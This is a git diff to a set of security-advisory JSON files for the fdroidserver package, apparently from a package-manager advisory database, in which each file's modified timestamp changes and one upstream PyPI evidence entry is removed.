diff --git a/advisories/BREW-fdroidserver-CVE-2008-0299.json b/advisories/BREW-fdroidserver-CVE-2008-0299.json index f383a2239c..7a7015ed3f 100644 --- a/advisories/BREW-fdroidserver-CVE-2008-0299.json +++ b/advisories/BREW-fdroidserver-CVE-2008-0299.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2008-0299", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-wqmm-q65g-2hqr", "CVE-2008-0299", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "paramiko", - "subject_version": "5.0.0", - "key": "pkg:pypi/paramiko@5.0.0", - "resource": "paramiko" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2010-2480.json b/advisories/BREW-fdroidserver-CVE-2010-2480.json index 9d36131afe..01abbb6865 100644 --- a/advisories/BREW-fdroidserver-CVE-2010-2480.json +++ b/advisories/BREW-fdroidserver-CVE-2010-2480.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2010-2480", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-7q8x-38mc-p84f", "CVE-2010-2480", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "mako", - "subject_version": "1.4.1", - "key": "pkg:pypi/mako@1.4.1", - "resource": "mako" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2010-4340.json b/advisories/BREW-fdroidserver-CVE-2010-4340.json index 995f97a4b6..bee77e72b0 100644 --- a/advisories/BREW-fdroidserver-CVE-2010-4340.json +++ b/advisories/BREW-fdroidserver-CVE-2010-4340.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2010-4340", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:11:34Z", "upstream": [ "GHSA-w3j6-8j34-q43x", "CVE-2010-4340", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "apache-libcloud", - "subject_version": "3.9.1", - "key": "pkg:pypi/apache-libcloud@3.9.1", - "resource": "apache-libcloud" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2012-0805.json b/advisories/BREW-fdroidserver-CVE-2012-0805.json index 8dc3f67466..93ff4dc263 100644 --- a/advisories/BREW-fdroidserver-CVE-2012-0805.json +++ b/advisories/BREW-fdroidserver-CVE-2012-0805.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2012-0805", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:53:08Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-hfg2-wf6j-x53p", "CVE-2012-0805", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "sqlalchemy", - "subject_version": "2.0.52", - "key": "pkg:pypi/sqlalchemy@2.0.52", - "resource": "sqlalchemy" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2012-3446.json b/advisories/BREW-fdroidserver-CVE-2012-3446.json index 6d5214693f..1e29344d74 100644 --- a/advisories/BREW-fdroidserver-CVE-2012-3446.json +++ b/advisories/BREW-fdroidserver-CVE-2012-3446.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2012-3446", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:11:34Z", "upstream": [ "GHSA-prcq-52f8-fp44", "CVE-2012-3446", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "apache-libcloud", - "subject_version": "3.9.1", - "key": "pkg:pypi/apache-libcloud@3.9.1", - "resource": "apache-libcloud" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2013-6480.json b/advisories/BREW-fdroidserver-CVE-2013-6480.json index 973813d958..6317d2163a 100644 --- a/advisories/BREW-fdroidserver-CVE-2013-6480.json +++ b/advisories/BREW-fdroidserver-CVE-2013-6480.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2013-6480", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:11:34Z", "upstream": [ "GHSA-g892-9h8m-r69r", "CVE-2013-6480", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "apache-libcloud", - "subject_version": "3.9.1", - "key": "pkg:pypi/apache-libcloud@3.9.1", - "resource": "apache-libcloud" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2014-1829.json b/advisories/BREW-fdroidserver-CVE-2014-1829.json index 4680111175..38c20b8e26 100644 --- a/advisories/BREW-fdroidserver-CVE-2014-1829.json +++ b/advisories/BREW-fdroidserver-CVE-2014-1829.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2014-1829", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-cfj3-7x9c-4p3h", "CVE-2014-1829", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2014-1830.json b/advisories/BREW-fdroidserver-CVE-2014-1830.json index 99d5631e55..8f46bd12b1 100644 --- a/advisories/BREW-fdroidserver-CVE-2014-1830.json +++ b/advisories/BREW-fdroidserver-CVE-2014-1830.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2014-1830", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-652x-xj99-gmcc", "CVE-2014-1830", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2014-3146.json b/advisories/BREW-fdroidserver-CVE-2014-3146.json index ddd6e1979d..07bd714855 100644 --- a/advisories/BREW-fdroidserver-CVE-2014-3146.json +++ b/advisories/BREW-fdroidserver-CVE-2014-3146.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2014-3146", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:53:08Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-57qw-cc2g-pv5p", "CVE-2014-3146", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.3", - "key": "pkg:pypi/lxml@6.1.3", - "resource": "lxml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2014-3429.json b/advisories/BREW-fdroidserver-CVE-2014-3429.json index 447a79571f..fcc04587c4 100644 --- a/advisories/BREW-fdroidserver-CVE-2014-3429.json +++ b/advisories/BREW-fdroidserver-CVE-2014-3429.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2014-3429", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:53:08Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-75cw-5cgv-g853", "CVE-2014-3429", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ipython", - "subject_version": "9.17.1", - "key": "pkg:pypi/ipython@9.17.1", - "resource": "ipython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2015-2296.json b/advisories/BREW-fdroidserver-CVE-2015-2296.json index 64cd945ab9..a0b0ea1763 100644 --- a/advisories/BREW-fdroidserver-CVE-2015-2296.json +++ b/advisories/BREW-fdroidserver-CVE-2015-2296.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2015-2296", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-pg2w-x9wp-vw92", "CVE-2015-2296", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2015-4706.json b/advisories/BREW-fdroidserver-CVE-2015-4706.json index d73f78cb79..c68741461d 100644 --- a/advisories/BREW-fdroidserver-CVE-2015-4706.json +++ b/advisories/BREW-fdroidserver-CVE-2015-4706.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2015-4706", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:53:08Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-q326-jhw3-699g", "CVE-2015-4706", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ipython", - "subject_version": "9.17.1", - "key": "pkg:pypi/ipython@9.17.1", - "resource": "ipython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2015-4707.json b/advisories/BREW-fdroidserver-CVE-2015-4707.json index 41ec35c99b..694e8795ee 100644 --- a/advisories/BREW-fdroidserver-CVE-2015-4707.json +++ b/advisories/BREW-fdroidserver-CVE-2015-4707.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2015-4707", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:53:08Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-66gw-5xpf-gfp5", "CVE-2015-4707", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ipython", - "subject_version": "9.17.1", - "key": "pkg:pypi/ipython@9.17.1", - "resource": "ipython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2015-5607.json b/advisories/BREW-fdroidserver-CVE-2015-5607.json index f7b9190c1c..210879348d 100644 --- a/advisories/BREW-fdroidserver-CVE-2015-5607.json +++ b/advisories/BREW-fdroidserver-CVE-2015-5607.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2015-5607", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:53:08Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-7fc2-rm35-2pp7", "CVE-2015-5607", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ipython", - "subject_version": "9.17.1", - "key": "pkg:pypi/ipython@9.17.1", - "resource": "ipython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2015-6938.json b/advisories/BREW-fdroidserver-CVE-2015-6938.json index b1bce08f22..440b3d4e25 100644 --- a/advisories/BREW-fdroidserver-CVE-2015-6938.json +++ b/advisories/BREW-fdroidserver-CVE-2015-6938.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2015-6938", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:53:08Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-4vwq-x64q-j4cj", "CVE-2015-6938", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ipython", - "subject_version": "9.17.1", - "key": "pkg:pypi/ipython@9.17.1", - "resource": "ipython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2015-7337.json b/advisories/BREW-fdroidserver-CVE-2015-7337.json index 64b3de69b1..0705072d50 100644 --- a/advisories/BREW-fdroidserver-CVE-2015-7337.json +++ b/advisories/BREW-fdroidserver-CVE-2015-7337.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2015-7337", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:53:08Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-92mr-v722-f48m", "CVE-2015-7337", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ipython", - "subject_version": "9.17.1", - "key": "pkg:pypi/ipython@9.17.1", - "resource": "ipython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2015-8557.json b/advisories/BREW-fdroidserver-CVE-2015-8557.json index a84a94b2ef..3f8cf781ad 100644 --- a/advisories/BREW-fdroidserver-CVE-2015-8557.json +++ b/advisories/BREW-fdroidserver-CVE-2015-8557.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2015-8557", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:53:08Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-fff8-4w9p-7v76", "CVE-2015-8557", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.21.0", - "key": "pkg:pypi/pygments@2.21.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2016-9015.json b/advisories/BREW-fdroidserver-CVE-2016-9015.json index 3bf291ed54..67843d3b80 100644 --- a/advisories/BREW-fdroidserver-CVE-2016-9015.json +++ b/advisories/BREW-fdroidserver-CVE-2016-9015.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2016-9015", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-v4w5-p2hg-8fh6", "CVE-2016-9015", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2017-18342.json b/advisories/BREW-fdroidserver-CVE-2017-18342.json index 646dbe445e..6be2eeb9ac 100644 --- a/advisories/BREW-fdroidserver-CVE-2017-18342.json +++ b/advisories/BREW-fdroidserver-CVE-2017-18342.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2017-18342", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-rprw-h62v-c2w7", "CVE-2017-18342", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2018-1000805.json b/advisories/BREW-fdroidserver-CVE-2018-1000805.json index 6a6afa4cfc..6e91e77e5f 100644 --- a/advisories/BREW-fdroidserver-CVE-2018-1000805.json +++ b/advisories/BREW-fdroidserver-CVE-2018-1000805.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2018-1000805", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-f2j6-wrhh-v25m", "CVE-2018-1000805", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "paramiko", - "subject_version": "5.0.0", - "key": "pkg:pypi/paramiko@5.0.0", - "resource": "paramiko" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2018-18074.json b/advisories/BREW-fdroidserver-CVE-2018-18074.json index 73c0af3ba1..41a4886617 100644 --- a/advisories/BREW-fdroidserver-CVE-2018-18074.json +++ b/advisories/BREW-fdroidserver-CVE-2018-18074.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2018-18074", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-x84v-xcm2-53pg", "CVE-2018-18074", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2018-19787.json b/advisories/BREW-fdroidserver-CVE-2018-19787.json index 5177774b24..aff1482ec1 100644 --- a/advisories/BREW-fdroidserver-CVE-2018-19787.json +++ b/advisories/BREW-fdroidserver-CVE-2018-19787.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2018-19787", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:53:08Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-xp26-p53h-6h2p", "CVE-2018-19787", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.3", - "key": "pkg:pypi/lxml@6.1.3", - "resource": "lxml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2018-20060.json b/advisories/BREW-fdroidserver-CVE-2018-20060.json index 33b90c5a33..dd799a77f0 100644 --- a/advisories/BREW-fdroidserver-CVE-2018-20060.json +++ b/advisories/BREW-fdroidserver-CVE-2018-20060.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2018-20060", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-www2-v7xj-xrc6", "CVE-2018-20060", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2018-25091.json b/advisories/BREW-fdroidserver-CVE-2018-25091.json index 0d3ebfb9ad..4d6670c33b 100644 --- a/advisories/BREW-fdroidserver-CVE-2018-25091.json +++ b/advisories/BREW-fdroidserver-CVE-2018-25091.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2018-25091", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-gwvm-45gx-3cf8", "CVE-2018-25091", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2018-7750.json b/advisories/BREW-fdroidserver-CVE-2018-7750.json index 3f517c5e72..1b8de33cbc 100644 --- a/advisories/BREW-fdroidserver-CVE-2018-7750.json +++ b/advisories/BREW-fdroidserver-CVE-2018-7750.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2018-7750", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-232r-66cg-79px", "CVE-2018-7750", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "paramiko", - "subject_version": "5.0.0", - "key": "pkg:pypi/paramiko@5.0.0", - "resource": "paramiko" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2019-11236.json b/advisories/BREW-fdroidserver-CVE-2019-11236.json index 97cad2fa68..67e7aea198 100644 --- a/advisories/BREW-fdroidserver-CVE-2019-11236.json +++ b/advisories/BREW-fdroidserver-CVE-2019-11236.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2019-11236", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-r64q-w8jr-g9qp", "CVE-2019-11236", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2019-11324.json b/advisories/BREW-fdroidserver-CVE-2019-11324.json index a103ed152d..5d83eef25e 100644 --- a/advisories/BREW-fdroidserver-CVE-2019-11324.json +++ b/advisories/BREW-fdroidserver-CVE-2019-11324.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2019-11324", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-mh33-7rrq-662w", "CVE-2019-11324", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2019-18874.json b/advisories/BREW-fdroidserver-CVE-2019-18874.json index 21ffaa2fcc..9e99029430 100644 --- a/advisories/BREW-fdroidserver-CVE-2019-18874.json +++ b/advisories/BREW-fdroidserver-CVE-2019-18874.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2019-18874", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-qfc5-mcwq-26q8", "CVE-2019-18874", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "psutil", - "subject_version": "7.2.2", - "key": "pkg:pypi/psutil@7.2.2", - "resource": "psutil" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2019-20477.json b/advisories/BREW-fdroidserver-CVE-2019-20477.json index 8179c11e5b..5b599dac6d 100644 --- a/advisories/BREW-fdroidserver-CVE-2019-20477.json +++ b/advisories/BREW-fdroidserver-CVE-2019-20477.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2019-20477", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-3pqx-4fqf-j49f", "CVE-2019-20477", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2019-7164.json b/advisories/BREW-fdroidserver-CVE-2019-7164.json index acdb6bb036..163d8793bd 100644 --- a/advisories/BREW-fdroidserver-CVE-2019-7164.json +++ b/advisories/BREW-fdroidserver-CVE-2019-7164.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2019-7164", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:53:08Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-887w-45rq-vxgf", "CVE-2019-7164", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "sqlalchemy", - "subject_version": "2.0.52", - "key": "pkg:pypi/sqlalchemy@2.0.52", - "resource": "sqlalchemy" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2019-7548.json b/advisories/BREW-fdroidserver-CVE-2019-7548.json index d4e8e6360d..32edd8a666 100644 --- a/advisories/BREW-fdroidserver-CVE-2019-7548.json +++ b/advisories/BREW-fdroidserver-CVE-2019-7548.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2019-7548", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:53:08Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-38fc-9xqv-7f7q", "CVE-2019-7548", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "sqlalchemy", - "subject_version": "2.0.52", - "key": "pkg:pypi/sqlalchemy@2.0.52", - "resource": "sqlalchemy" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2020-14343.json b/advisories/BREW-fdroidserver-CVE-2020-14343.json index 6fab48599c..78b7542cb1 100644 --- a/advisories/BREW-fdroidserver-CVE-2020-14343.json +++ b/advisories/BREW-fdroidserver-CVE-2020-14343.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2020-14343", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-8q59-q68h-6hv4", "CVE-2020-14343", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2020-1747.json b/advisories/BREW-fdroidserver-CVE-2020-1747.json index 5442992d62..a394ceb996 100644 --- a/advisories/BREW-fdroidserver-CVE-2020-1747.json +++ b/advisories/BREW-fdroidserver-CVE-2020-1747.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2020-1747", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-6757-jp84-gxfx", "CVE-2020-1747", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2020-26137.json b/advisories/BREW-fdroidserver-CVE-2020-26137.json index 4f226b1eb5..8fea89ea64 100644 --- a/advisories/BREW-fdroidserver-CVE-2020-26137.json +++ b/advisories/BREW-fdroidserver-CVE-2020-26137.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2020-26137", 